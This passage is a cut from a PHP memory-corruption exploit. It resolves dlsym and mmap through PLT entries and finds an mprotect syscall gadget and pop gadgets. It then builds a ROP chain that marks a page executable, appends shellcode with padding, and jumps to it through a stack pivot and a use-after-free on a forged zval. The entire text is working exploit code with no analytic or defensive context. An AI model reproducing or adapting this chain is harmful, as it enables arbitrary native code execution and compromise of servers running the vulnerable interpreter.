nogc($addr); $dlsym = getplt($addr, "_dlsym"); // get plt entry nogc($dlsym); $mmap_plt = getplt($addr, "_mmap"); // get plt entry $mmap = r64(r32($mmap_plt + 2) + $mmap_plt + 6); nogc($mmap); $mprotect = gadget(findmhfromaddr($mmap), "b84a000002"); // find b84a000002 movl $0x200004a, %eax -> mprotect syscall nogc($mprotect); function ig($a, $b) { return ibuf(gadget($a, $b), 8); } $arg1 = ig($addr, "5fc3"); $arg2 = ig($addr, "5ec3"); $arg3 = ig(findmhfromaddr($mmap), "5ac3"); $stack = $arg1; $stack .= w64($all['ptr'] & ~0xfff); $stack .= $arg2; $stack .= w64(4096 * 2); $stack .= $arg3; $stack .= w64(7); $stack .= w64($mprotect); $stack .= w64($all['ptr']); $stack .= w64($dlsym); $pad = str_repeat("z", 2048 + (0x10 - (strlen($shellcode) & 0xf))); $payload = $shellcode . $pad . $stack; memcpy($all, $payload); jump(stackPivot($addr), ibuf(0, 8) . ibuf(0, 8) . ibuf(0, 8) . ig($addr, "5cc3") . ibuf($all['ptr'] + strlen($shellcode) + strlen($pad), 8));
function jump($addr, $rax) { $raxlen = strlen($rax); $al = shiftalloc(alloc(1024 + $raxlen + 16), 1024); memcpy($al, $rax, $raxlen); memcpy($al, ibuf(0, 8) . ibuf($addr, 8), 16); $zv = zval(0, $al['ptr'], 5, 0); uaf($zv); }